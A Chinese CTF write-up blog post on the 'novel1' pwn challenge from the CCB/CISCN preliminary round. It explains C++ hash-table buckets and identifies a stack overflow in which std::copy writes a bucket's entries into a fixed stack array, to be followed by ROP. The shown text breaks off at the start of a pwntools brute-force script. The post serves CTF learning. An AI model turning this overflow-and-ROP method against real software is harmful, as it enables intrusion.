<!doctype html><html lang=zh-CN data-theme=light><head><meta charset=UTF-8><meta name=viewport content="width=device-width"><meta name=theme-color content="#222" media="(prefers-color-scheme: light)"><meta name=generator content="Hugo 0.126.1"><link rel="shortcut icon" type=image/x-icon href=/imgs/icons/favicon.ico><link rel=icon type=image/x-icon href=/imgs/icons/favicon.ico><link rel=icon type=image/png sizes=16x16 href=/imgs/icons/favicon_16x16_next.png><link rel=icon type=image/png sizes=32x32 href=/imgs/icons/favicon_32_32_next.png><link rel=apple-touch-icon sizes=180x180 href=/imgs/icons/apple_touch_icon_next.png><meta itemprop=name content="CCBCISCN初赛"><meta itemprop=description content="集中一点,登峰造极"><meta name=description content="集中一点,登峰造极"><meta itemprop=datePublished zgotmplz><meta itemprop=dateModified zgotmplz><meta itemprop=image content="https://zp9080.github.io/imgs/author.png"><meta itemprop=keywords content><meta property="og:type" content="article"><meta property="og:title" content="CCBCISCN初赛"><meta property="og:description" content="集中一点,登峰造极"><meta property="og:image" content="/imgs/author.png"><meta property="og:image:width" content="312"><meta property="og:image:height" content="312"><meta property="og:image:type" content="image/jpeg/png/svg/jpg"><meta property="og:url" content="https://zp9080.github.io/post/wp%E5%90%88%E9%9B%86/ccbciscn%E5%88%9D%E8%B5%9B/"><meta property="og:site_name" content="f1ow-blog"><meta property="og:locale" content="zh-CN"><meta property="article:author" content="f1ow"><meta property="article:published_time" content="2025-01-11 21:27:26 +0800 CST"><meta property="article:modified_time" content="2025-01-11 21:27:26 +0800 CST"><link type=text/css rel=stylesheet href=https://zp9080.github.io/3rd/font-awesome/6.6.0/css/all.min.css><link type=text/css rel=stylesheet href=https://zp9080.github.io/3rd/animate.css/4.1.1/animate.min.css><link type=text/css rel=stylesheet href=https://zp9080.github.io/3rd/viewerjs/1.11.6/viewer.min.css><link rel=stylesheet href=/css/main.min.bfbac3431de920c11b5b1cafa45029ea1bc93d5d3da50fed4ab6924b4c250360.css><script type=text/javascript>(function(){localDB={set:function(e,t,n){if(n===0)return;const s=new Date,o=n*864e5,i={value:t,expiry:s.getTime()+o};localStorage.setItem(e,JSON.stringify(i))},get:function(e){const t=localStorage.getItem(e);if(!t)return void 0;const n=JSON.parse(t),s=new Date;return s.getTime()>n.expiry?(localStorage.removeItem(e),void 0):n.value}},theme={active:function(){const e=localDB.get("theme");if(e==null)return;theme.toggle(e),window.matchMedia("(prefers-color-scheme: dark)").addListener(function(e){theme.toggle(e.matches?"dark":"light")})},toggle:function(e){document.documentElement.setAttribute("data-theme",e),localDB.set("theme",e,2);const t=document.querySelector("iframe.giscus-frame");if(t){const n={setConfig:{theme:e}};t.contentWindow.postMessage({giscus:n},"https://giscus.app")}}},theme.active()})(window)</script><script class=next-config data-name=page type=application/json>{"comments":false,"isHome":false,"isPage":true,"path":"ccbciscn%E5%88%9D%E8%B5%9B","permalink":"https://zp9080.github.io/post/wp%E5%90%88%E9%9B%86/ccbciscn%E5%88%9D%E8%B5%9B/","title":"CCBCISCN初赛","waline":{"js":[{"alias":"@waline/client","alias_name":"waline","file":"dist/pageview.js","name":"pageview","version":"2.15.8"},{"alias":"@waline/client","alias_name":"waline","file":"dist/comment.js","name":"comment","version":"2.15.8"}]}}</script><script type=text/javascript>document.addEventListener("DOMContentLoaded",()=>{var e=document.createElement("script");e.charset="UTF-8",e.src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js",e.async=!1,e.defer=!0,document.head.appendChild(e),e.onload=function(){NexT.utils.fmtBusuanzi()}})</script><title>CCBCISCN初赛 - f1ow-blog</title><noscript><link rel=stylesheet href=/css/noscript.css></noscript></head><body itemscope itemtype=http://schema.org/WebPage class=use-motion><div class=headband></div><div class=overlay></div><main class=main><header class=header itemscope itemtype=http://schema.org/WPHeader><div class=header-inner><div class=site-brand-container><div class=site-nav-toggle><div class=toggle aria-label role=button><span class=toggle-line></span>
<span class=toggle-line></span>
<span class=toggle-line></span></div></div><div class=site-meta><a href=/ class=brand rel=start><i class=logo-line></i><h1 class=site-title>f1ow-blog</h1><i class=logo-line></i></a><p class=site-subtitle itemprop=description>集中一点,登峰造极</p></div><div class=site-nav-right><div class="toggle popup-trigger"><i class="fa fa-search fa-fw fa-lg"></i></div></div></div><nav class=site-nav><ul class="main-menu menu"><li class="menu-item menu-item-home"><a href=/ class=hvr-icon-pulse rel=section><i class="fa fa-home hvr-icon"></i>首页</a></li><li class="menu-item menu-item-about"><a href=/about/ class=hvr-icon-pulse rel=section><i class="fa fa-user hvr-icon"></i>关于</a></li><li class="menu-item menu-item-archives"><a href=/ class=hvr-icon-pulse rel=section><i class="fa fa-archive hvr-icon"></i>归档
<span class=badge>207</span></a></li><li class="menu-item menu-item-categories"><a href=/categories/ class=hvr-icon-pulse rel=section><i class="fa fa-categories hvr-icon"></i>分类</a></li><li class="menu-item menu-item-tags"><a href=/tags/ class=hvr-icon-pulse rel=section><i class="fa fa-tags hvr-icon"></i>标签</a></li><li class="menu-item menu-item-search"><a role=button class="popup-trigger hvr-icon-pulse"><i class="fa fa-search fa-fw hvr-icon"></i>搜索</a></li></ul></nav><div class=search-pop-overlay><div class="popup search-popup"><div class=search-header><span class=search-icon><i class="fa fa-search"></i></span><div class=search-input-container><input autocomplete=off autocapitalize=off maxlength=80 placeholder=搜索... spellcheck=false type=search class=search-input></div><span class=popup-btn-close role=button><i class="fa fa-times-circle"></i></span></div><div class="search-result-container no-result"><div class=search-result-icon><i class="fa fa-spinner fa-pulse fa-5x"></i></div></div></div></div></div><div class="toggle sidebar-toggle" role=button><span class=toggle-line></span>
<span class=toggle-line></span>
<span class=toggle-line></span></div><aside class=sidebar><div class="sidebar-inner sidebar-nav-active sidebar-toc-active"><ul class=sidebar-nav><li class=sidebar-nav-toc>文章目录</li><li class=sidebar-nav-overview>站点概览</li></ul><div class=sidebar-panel-container><div class="post-toc-wrap sidebar-panel"><div class="post-toc animated"><nav id=TableOfContents><ul><li><a href=#novel1>novel1</a><ul><li><a href=#bucket相关知识>bucket相关知识</a><ul><li><a href=#1哈希表的基本概念>1. <strong>哈希表的基本概念</strong></a></li><li><a href=#2bucket的作用>2. <strong><code>bucket</code> 的作用</strong></a></li><li><a href=#3c-中的bucket相关操作>3. <strong>C++ 中的 <code>bucket</code> 相关操作</strong></a></li><li><a href=#4示例代码>4. <strong>示例代码</strong></a></li><li><a href=#5总结>5. <strong>总结</strong></a></li></ul></li><li><a href=#题目分析>题目分析</a><ul><li><a href=#1stdcopy的作用>1. <strong><code>std::copy</code> 的作用</strong></a></li><li><a href=#2代码中的stdcopy>2. <strong>代码中的 <code>std::copy</code></strong></a><ul><li><a href=#参数解析>参数解析：</a></li><li><a href=#功能>功能：</a></li></ul></li><li><a href=#3代码的上下文>3. <strong>代码的上下文</strong></a></li></ul></li><li><a href=#exp编写>EXP编写</a></li><li><a href=#一些思考>一些思考</a></li></ul></li><li><a href=#anyip>anyip</a></li></ul></nav></div></div><div class="site-overview-wrap sidebar-panel"><div class="site-author site-overview-item animated" itemprop=author itemscope itemtype=http://schema.org/Person><img class=site-author-image itemprop=image alt=f1ow src=/imgs/img-lazy-loading.gif data-src=/imgs/author.png><p class=site-author-name itemprop=name>f1ow</p><div class=site-description itemprop=description>集中一点,登峰造极</div></div><div class="site-state-wrap site-overview-item animated"><nav class=site-state><div class="site-state-item site-state-posts"><a href=/archives/><span class=site-state-item-count>207</span>
<span class=site-state-item-name>日志</span></a></div><div class="site-state-item site-state-categories"><a href=/categories/><span class=site-state-item-count>38</span>
<span class=site-state-item-name>分类</span></a></div><div class="site-state-item site-state-tags"><a href=/tags/><span class=site-state-item-count>80</span>
<span class=site-state-item-name>标签</span></a></div></nav></div><div class="links-of-social site-overview-item animated"><span class=links-of-social-item><a href=https://github.com/zp9080 title="Github → https://github.com/zp9080" rel=noopener class=hvr-icon-pulse target=_blank><i class="fab fa-github fa-fw hvr-icon"></i>
Github</a></span></div><div class="cc-license animated" itemprop=license><a href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh class=cc-opacity rel=noopener target=_blank title=共享知识><img src=/imgs/img-lazy-loading.gif data-src=/imgs/cc/big/by_nc_sa.svg alt=共享知识></a></div><div class="links-of-blogroll site-overview-item animated"><div class=links-of-blogroll-title><i class="fa fa-globe fa-fw"></i>
友情链接</div><ul class=links-of-blogroll-list><li class=links-of-blogroll-item><a href=https://v3rdant.cn/ title=https://v3rdant.cn/ target=_blank>v3rdant</a></li><li class=links-of-blogroll-item><a href=https://juicymio.github.io/ title=https://juicymio.github.io/ target=_blank>juicymio</a></li><li class=links-of-blogroll-item><a href=https://ka7arotto.github.io/ title=https://ka7arotto.github.io/ target=_blank>Goku</a></li></ul></div></div></div></div><div id=siteinfo-card-widget class=sidebar-card-widget><div class=item-headline><i class="fas fa-chart-line"></i>
<span>网站资讯</span></div><div class=siteinfo><div class=siteinfo-item><div class=item-name><i class="fa-solid fa-calendar-check"></i>已运行：</div><div class=item-count id=runTimes data-publishdate=2024-07-28T00:00:00+00:00></div></div><div class=siteinfo-item><div class=item-name><i class="fas fa fa-user"></i>总访客数：</div><div class=item-count id=busuanzi_value_site_uv><i class="fa fa-sync fa-spin"></i></div></div><div class=siteinfo-item><div class=item-name><i class="fas fa fa-eye"></i>页面浏览：</div><div class=item-count id=busuanzi_value_site_pv><i class="fa fa-sync fa-spin"></i></div></div><div class=siteinfo-item><div class=item-name><i class="fa fa-font"></i>总字数：</div><div class=item-count id=wordsCount data-count=273686></div></div><div class=siteinfo-item><div class=item-name><i class="fa fa-mug-hot"></i>阅读约：</div><div class=item-count id=readTimes data-times=660></div></div><div class=siteinfo-item><div class=item-name><i class="fa fa-clock-rotate-left"></i>最后更新于：</div><div class=item-count id=last-push-date data-lastpushdate=2025-02-27T17:57:37+08:00></div></div></div></div></aside><div class=sidebar-dimmer></div></header><div class=tool-buttons><div id=toggle-theme class=button title=深浅模式切换><i class="fas fa-adjust"></i></div><div class=back-to-top role=button title=返回顶部><i class="fa fa-arrow-up"></i>
<span>0%</span></div></div><div class=reading-progress-bar></div><a role=button class="book-mark-link book-mark-link-fixed"></a><a href=https://github.com/zp9080 rel="noopener external nofollow noreferrer" target=_blank title="Follow me on GitHub" class="exturl github-corner"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0 0 115 115h15l12 27L250 250V0z"/><path d="M128.3 109C113.8 99.7 119 89.6 119 89.6 122 82.7 120.5 78.6 120.5 78.6 119.2 72 123.4 76.3 123.4 76.3 127.3 80.9 125.5 87.3 125.5 87.3 122.9 97.6 130.6 101.9 134.4 103.2" fill="currentcolor" style="transform-origin:130px 106px" class="octo-arm"/><path d="M115 115C114.9 115.1 118.7 116.5 119.8 115.4l13.9-13.8C136.9 99.2 139.9 98.4 142.2 98.6 133.8 88 127.5 74.4 143.8 58 148.5 53.4 154 51.2 159.7 51 160.3 49.4 163.2 43.6 171.4 40.1 171.4 40.1 176.1 42.5 178.8 56.2 183.1 58.6 187.2 61.8 190.9 65.4 194.5 69 197.7 73.2 200.1 77.6 213.8 80.2 216.3 84.9 216.3 84.9 212.7 93.1 206.9 96 205.4 96.6 205.1 102.4 203 107.8 198.3 112.5 181.9 128.9 168.3 122.5 157.7 114.1 157.9 116.9 156.7 120.9 152.7 124.9L141 136.5C139.8 137.7 141.6 141.9 141.8 141.8z" fill="currentcolor" class="octo-body"/></svg>
</a><script type=text/javascript src=//sidecar.gitter.im/dist/sidecar.v1.js async></script><script type=text/javascript>((window.gitter={}).chat={}).options={room:"hugo-next/community"}</script><noscript><div class=noscript-warning>Theme NexT works best with JavaScript enabled</div></noscript><div class="main-inner post posts-expand"><div class=post-block><article itemscope itemtype=http://schema.org/Article class=post-content lang><link itemprop=mainEntityOfPage href=https://zp9080.github.io/post/wp%E5%90%88%E9%9B%86/ccbciscn%E5%88%9D%E8%B5%9B/><span hidden itemprop=author itemscope itemtype=http://schema.org/Person><meta itemprop=image content="/imgs/author.png"><meta itemprop=name content="f1ow"></span><span hidden itemprop=publisher itemscope itemtype=http://schema.org/Organization><meta itemprop=name content="f1ow"><meta itemprop=description content="集中一点,登峰造极"></span><span hidden itemprop=post itemscope itemtype=http://schema.org/CreativeWork><meta itemprop=name content="CCBCISCN初赛"><meta itemprop=description content></span><header class=post-header><h1 class=post-title itemprop="name headline">CCBCISCN初赛
<a href=https://github.com/user-name/repo-name/tree/branch-name/subdirectory-name/post/WP%e5%90%88%e9%9b%86/CCBCISCN%e5%88%9d%e8%b5%9b.md rel="noopener external nofollow noreferrer" target=_blank class="exturl post-edit-link" title=编辑><i class="fa fa-pen-nib"></i></a></h1><div class=post-meta-container><div class=post-meta-items><span class=post-meta-item><span class=post-meta-item-icon><i class="fas fa-solid fa-calendar"></i>
</span><span class=post-meta-item-text title=发表于>发表于：
</span><time title="创建时间：2025-01-11 21:27:26 +0800 CST" itemprop="dateCreated datePublished" datetime="2025-01-11 21:27:26 +0800 CST">2025-01-11
</time></span><span class=post-meta-item><span class=post-meta-item-icon><i class="fas fa-solid fa-folder-open"></i>
</span><span class=post-meta-item-text title=分类于>分类于：
</span><span itemprop=about itemscope itemtype=http://schema.org/Thing><a href=/categories/wp%E5%90%88%E9%9B%86 itemprop=url rel=index><span itemprop=name>WP合集</span></a></span></span></div><div class=post-meta-items><span class=post-meta-item title=字数><span class=post-meta-item-icon><i class="fas fa-solid fa-file-word"></i>
</span><span class=post-meta-item-text>字数：</span>
<span>4015</span>
</span><span class=post-meta-item title=阅读><span class=post-meta-item-icon><i class="fas fa-solid fa-clock"></i>
</span><span class=post-meta-item-text>阅读：&ap;</span>
<span>9分钟</span>
</span><span class=post-meta-item title=浏览><span class=post-meta-item-icon><i class="fas fa-solid fa-eye"></i>
</span><span class=post-meta-item-text>浏览：
</span><span id=busuanzi_value_page_pv data-path=/post/wp%E5%90%88%E9%9B%86/ccbciscn%E5%88%9D%E8%B5%9B/><i class="fa fa-sync fa-spin"></i></span></span></div></div></header><div class="post-body autonumber" itemprop=articleBody><h1 id=novel1>novel1
<a class=header-anchor href=#novel1></a></h1><h2 id=bucket相关知识>bucket相关知识
<a class=header-anchor href=#bucket%e7%9b%b8%e5%85%b3%e7%9f%a5%e8%af%86></a></h2><p>在C++中，<strong><code>bucket</code></strong> 通常与哈希表（Hash Table）或无序容器（如 <code>std::unordered_map</code> 和 <code>std::unordered_set</code>）相关。它表示哈希表中的一个存储单元，用于存储具有相同哈希值的元素。</p><h3 id=1哈希表的基本概念>1. <strong>哈希表的基本概念</strong>
<a class=header-anchor href=#1%e5%93%88%e5%b8%8c%e8%a1%a8%e7%9a%84%e5%9f%ba%e6%9c%ac%e6%a6%82%e5%bf%b5></a></h3><p>哈希表是一种数据结构，它通过哈希函数将键（key）映射到一个索引（bucket），然后将值存储在该索引对应的位置。哈希表的核心思想是通过哈希函数将键均匀分布到不同的桶（bucket）中，以实现高效的查找、插入和删除操作。</p><h3 id=2bucket的作用>2. <strong><code>bucket</code> 的作用</strong>
<a class=header-anchor href=#2bucket%e7%9a%84%e4%bd%9c%e7%94%a8></a></h3><ul><li><p><strong><code>bucket</code></strong> 是哈希表中的一个存储单元，通常是一个链表或其他容器（如数组或向量），用于存储具有相同哈希值的元素。</p></li><li><p>当多个键通过哈希函数映射到同一个索引时，这些键值对会被存储在同一个 <code>bucket</code> 中（这种情况称为哈希冲突）。</p></li><li><p>哈希表的性能与 <code>bucket</code> 的数量和分布密切相关。如果哈希函数设计得好，元素会均匀分布在各个 <code>bucket</code> 中，从而减少冲突，提高性能。</p></li></ul><h3 id=3c-中的bucket相关操作>3. <strong>C++ 中的 <code>bucket</code> 相关操作</strong>
<a class=header-anchor href=#3c-%e4%b8%ad%e7%9a%84bucket%e7%9b%b8%e5%85%b3%e6%93%8d%e4%bd%9c></a></h3><p>在 C++ 标准库中，<code>std::unordered_map</code> 和 <code>std::unordered_set</code> 是基于哈希表实现的容器。它们提供了与 <code>bucket</code> 相关的成员函数，例如：</p><ul><li><p><strong><code>bucket_count()</code></strong>: 返回哈希表中 <code>bucket</code> 的总数。</p></li><li><p><strong><code>bucket_size(n)</code></strong>: 返回第 <code>n</code> 个 <code>bucket</code> 中的元素数量。</p></li><li><p><strong><code>bucket(key)</code></strong>: 返回键 <code>key</code> 所在的 <code>bucket</code> 的索引。</p></li><li><p><strong><code>load_factor()</code></strong>: 返回哈希表的负载因子（即每个 <code>bucket</code> 的平均元素数量）。</p></li><li><p><strong><code>max_load_factor()</code></strong>: 返回或设置哈希表的最大负载因子。</p></li></ul><h3 id=4示例代码>4. <strong>示例代码</strong>
<a class=header-anchor href=#4%e7%a4%ba%e4%be%8b%e4%bb%a3%e7%a0%81></a></h3><p>以下是一个使用 <code>std::unordered_map</code> 并操作 <code>bucket</code> 的示例：</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-c++ data-lang=c++><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;iostream&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;unordered_map&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080></span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>int</span> <span style=color:#00a000>main</span>() {
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>// 创建一个 unordered_map
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    std<span style=color:#666>::</span>unordered_map<span style=color:#666>&lt;</span>std<span style=color:#666>::</span>string, <span style=color:#0b0;font-weight:700>int</span><span style=color:#666>&gt;</span> myMap <span style=color:#666>=</span> {
</span></span><span style=display:flex><span>        {<span style=color:#b44>&#34;apple&#34;</span>, <span style=color:#666>1</span>},
</span></span><span style=display:flex><span>        {<span style=color:#b44>&#34;banana&#34;</span>, <span style=color:#666>2</span>},
</span></span><span style=display:flex><span>        {<span style=color:#b44>&#34;cherry&#34;</span>, <span style=color:#666>3</span>},
</span></span><span style=display:flex><span>        {<span style=color:#b44>&#34;date&#34;</span>, <span style=color:#666>4</span>},
</span></span><span style=display:flex><span>        {<span style=color:#b44>&#34;elderberry&#34;</span>, <span style=color:#666>5</span>}
</span></span><span style=display:flex><span>    };
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>// 输出 bucket 的总数
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    std<span style=color:#666>::</span>cout <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34;Bucket count: &#34;</span> <span style=color:#666>&lt;&lt;</span> myMap.bucket_count() <span style=color:#666>&lt;&lt;</span> std<span style=color:#666>::</span>endl;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>// 输出每个 bucket 中的元素数量
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#a2f;font-weight:700>for</span> (size_t i <span style=color:#666>=</span> <span style=color:#666>0</span>; i <span style=color:#666>&lt;</span> myMap.bucket_count(); <span style=color:#666>++</span>i) {
</span></span><span style=display:flex><span>        std<span style=color:#666>::</span>cout <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34;Bucket &#34;</span> <span style=color:#666>&lt;&lt;</span> i <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34; has &#34;</span> <span style=color:#666>&lt;&lt;</span> myMap.bucket_size(i) <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34; elements.&#34;</span> <span style=color:#666>&lt;&lt;</span> std<span style=color:#666>::</span>endl;
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>// 输出某个键所在的 bucket
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    std<span style=color:#666>::</span>string key <span style=color:#666>=</span> <span style=color:#b44>&#34;banana&#34;</span>;
</span></span><span style=display:flex><span>    std<span style=color:#666>::</span>cout <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34;Key &#39;&#34;</span> <span style=color:#666>&lt;&lt;</span> key <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34;&#39; is in bucket &#34;</span> <span style=color:#666>&lt;&lt;</span> myMap.bucket(key) <span style=color:#666>&lt;&lt;</span> std<span style=color:#666>::</span>endl;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>// 输出负载因子
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    std<span style=color:#666>::</span>cout <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34;Load factor: &#34;</span> <span style=color:#666>&lt;&lt;</span> myMap.load_factor() <span style=color:#666>&lt;&lt;</span> std<span style=color:#666>::</span>endl;
</span></span><span style=display:flex><span>    std<span style=color:#666>::</span>cout <span style=color:#666>&lt;&lt;</span> <span style=color:#b44>&#34;Max load factor: &#34;</span> <span style=color:#666>&lt;&lt;</span> myMap.max_load_factor() <span style=color:#666>&lt;&lt;</span> std<span style=color:#666>::</span>endl;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> <span style=color:#666>0</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><h3 id=5总结>5. <strong>总结</strong>
<a class=header-anchor href=#5%e6%80%bb%e7%bb%93></a></h3><ul><li><p><strong><code>bucket</code></strong> 是哈希表中的一个存储单元，用于存储具有相同哈希值的元素。</p></li><li><p>在 C++ 中，<code>std::unordered_map</code> 和 <code>std::unordered_set</code> 提供了与 <code>bucket</code> 相关的操作函数，可以用于调试和优化哈希表的性能。</p></li><li><p>理解 <code>bucket</code> 的概念对于设计高效的哈希表和解决哈希冲突非常重要。</p></li></ul><h2 id=题目分析>题目分析
<a class=header-anchor href=#%e9%a2%98%e7%9b%ae%e5%88%86%e6%9e%90></a></h2><p>libc2.35 Partial RELRO,no canary,no pie，<strong>看到no canary首先想到这个题是不是栈溢出</strong></p><p>main函数非常简单 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/79.png alt></p><p>part1函数 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/80.png alt></p><p>fragment函数功能就是打印传入的字符串 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/81.png alt></p><p>part2函数 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/82.png alt></p><p>RACHE函数 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/83.png alt></p><p><strong>看到下面有个明显的copy函数，还看到了v3，明显是把数据复制到v3上去，而后面没有操作栈的地方了，因此漏洞肯定出现在这里。并且结合出题人给了个明显的后门函数RACHE，里面全是rop，明显是将之前part1输入的数据copy到栈上完成溢出然后rop，并且这个函数用完了就直接结束程序，更是提醒了这个函数就是漏洞函数</strong></p><h3 id=1stdcopy的作用>1. <strong><code>std::copy</code> 的作用</strong>
<a class=header-anchor href=#1stdcopy%e7%9a%84%e4%bd%9c%e7%94%a8></a></h3><p><code>std::copy</code> 是 C++ 标准库中的一个算法函数，用于将一个范围内的元素从源容器复制到目标容器。它的函数原型如下：</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-c++ data-lang=c++><span style=display:flex><span><span style=color:#a2f;font-weight:700>template</span><span style=color:#666>&lt;</span><span style=color:#a2f;font-weight:700>class</span> <span style=color:#00f>InputIterator</span>, <span style=color:#a2f;font-weight:700>class</span> <span style=color:#00f>OutputIterator</span><span style=color:#666>&gt;</span>
</span></span><span style=display:flex><span>OutputIterator copy(InputIterator first, InputIterator last, OutputIterator result);
</span></span></code></pre></div><ul><li><strong><code>first</code> 和 <code>last</code></strong>: 定义了源容器的范围（<code>[first, last)</code>）。</li><li><strong><code>result</code></strong>: 目标容器的起始位置，复制的结果将从这里开始存储。</li></ul><h3 id=2代码中的stdcopy>2. <strong>代码中的 <code>std::copy</code></strong>
<a class=header-anchor href=#2%e4%bb%a3%e7%a0%81%e4%b8%ad%e7%9a%84stdcopy></a></h3><p>在代码中，<code>std::copy</code> 的调用如下：</p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-c++ data-lang=c++><span style=display:flex><span>std<span style=color:#666>::</span>copy<span style=color:#666>&lt;</span>std<span style=color:#666>::</span>__detail<span style=color:#666>::</span>_Local_iterator<span style=color:#666>&lt;</span><span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>int</span>,std<span style=color:#666>::</span>pair<span style=color:#666>&lt;</span><span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>int</span> <span style=color:#a2f;font-weight:700>const</span>,<span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>long</span><span style=color:#666>&gt;</span>,std<span style=color:#666>::</span>__detail<span style=color:#666>::</span>_Select1st,std<span style=color:#666>::</span>hash<span style=color:#666>&lt;</span><span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>int</span><span style=color:#666>&gt;</span>,std<span style=color:#666>::</span>__detail<span style=color:#666>::</span>_Mod_range_hashing,std<span style=color:#666>::</span>__detail<span style=color:#666>::</span>_Default_ranged_hash,<span style=color:#a2f>false</span>,<span style=color:#a2f>false</span><span style=color:#666>&gt;</span>,std<span style=color:#666>::</span>pair<span style=color:#666>*&lt;</span><span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>int</span>,<span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>long</span><span style=color:#666>&gt;&gt;</span>(
</span></span><span style=display:flex><span>    begin,
</span></span><span style=display:flex><span>    end,
</span></span><span style=display:flex><span>    v3);
</span></span></code></pre></div><h4 id=参数解析>参数解析：
<a class=header-anchor href=#%e5%8f%82%e6%95%b0%e8%a7%a3%e6%9e%90></a></h4><ul><li><p><strong><code>begin</code> 和 <code>end</code></strong>:</p><ul><li>这两个参数是迭代器，表示哈希表中某个 <code>bucket</code> 的起始和结束位置。</li><li><code>begin</code> 是 <code>std::unordered_map</code> 中某个 <code>bucket</code> 的起始迭代器。</li><li><code>end</code> 是 <code>std::unordered_map</code> 中某个 <code>bucket</code> 的结束迭代器。</li><li>它们是通过 <code>std::unordered_map::begin(bucket_index)</code> 和 <code>std::unordered_map::end(bucket_index)</code> 获取的。</li></ul></li><li><p><strong><code>v3</code></strong>:</p><ul><li>这是一个数组（<code>_DWORD v3[39]</code>），用于存储从 <code>bucket</code> 中复制的元素。</li><li><code>v3</code> 是目标容器的起始位置，复制的结果将存储在这里。</li></ul></li></ul><h4 id=功能>功能：
<a class=header-anchor href=#%e5%8a%9f%e8%83%bd></a></h4><ul><li>将哈希表中某个 <code>bucket</code> 中的所有键值对（<code>std::pair&lt;unsigned int, unsigned long></code>）复制到数组 <code>v3</code> 中。</li></ul><h3 id=3代码的上下文>3. <strong>代码的上下文</strong>
<a class=header-anchor href=#3%e4%bb%a3%e7%a0%81%e7%9a%84%e4%b8%8a%e4%b8%8b%e6%96%87></a></h3><p>这段代码的功能是：</p><ol><li>用户输入一个键（<code>idx</code>），程序在哈希表 <code>bloodstains</code> 中查找该键。</li><li>如果键不存在，输出错误信息。</li><li>如果键存在，找到该键所在的 <code>bucket</code>，并获取该 <code>bucket</code> 的大小（<code>bucketSize</code>）。</li><li>使用 <code>std::copy</code> 将该 <code>bucket</code> 中的所有键值对复制到数组 <code>v3</code> 中。</li><li>遍历 <code>v3</code>，输出所有相似的键值对。</li></ol><h2 id=exp编写>EXP编写
<a class=header-anchor href=#exp%e7%bc%96%e5%86%99></a></h2><p><strong>需要注意的是，这个copy函数只会把同一个bucket内的东西复制到栈上，因此需要找哪些idx被映射到同一个bucket中。但注意到part2函数给了一个打印同一个bucket的循环，因此可以利用这个测出哪些Idx在同一个bucket</strong></p><ul><li><strong><code>idx</code> 的循环周期</strong></li></ul><p>如果 <code>idx</code> 是一个连续递增的整数（例如 <code>0, 1, 2, 3, ...</code>），那么它们是否会被放在同一个 <code>bucket</code> 中，取决于以下条件：</p><ul><li><p><strong>如果 <code>bucket_count()</code> 是固定的</strong>：</p><ul><li><p>由于 <code>bucket_index = idx % bucket_count()</code>，<code>idx</code> 的值每增加 <code>bucket_count()</code>，<code>bucket_index</code> 就会循环一次。</p></li><li><p>例如，如果 <code>bucket_count() = 10</code>，那么 <code>idx = 0, 10, 20, ...</code> 会被放在同一个 <code>bucket</code> 中。</p></li></ul></li><li><p><strong>如果 <code>bucket_count()</code> 是动态变化的</strong>：</p><ul><li><p><code>std::unordered_map</code> 会根据负载因子（<code>load_factor</code>）动态调整桶的数量。</p></li><li><p>当桶的数量变化时，<code>bucket_index</code> 的计算方式也会变化，因此 <code>idx</code> 的循环周期也会变化。</p></li></ul></li></ul><p><strong>因此写出以下exp来爆破如何在同一个bucket中</strong></p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#a2f;font-weight:700>for</span> j <span style=color:#a2f;font-weight:700>in</span> <span style=color:#a2f>range</span>(<span style=color:#666>1</span>,<span style=color:#666>100</span>):
</span></span><span style=display:flex><span>    p <span style=color:#666>=</span> process(<span style=color:#b44>&#34;/home/zp9080/PWN/novel1&#34;</span>)
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>sendlineafter(<span style=color:#b44>&#39;Author: &#39;</span>,<span style=color:#b44>b</span><span style=color:#b44>&#39;a&#39;</span>)
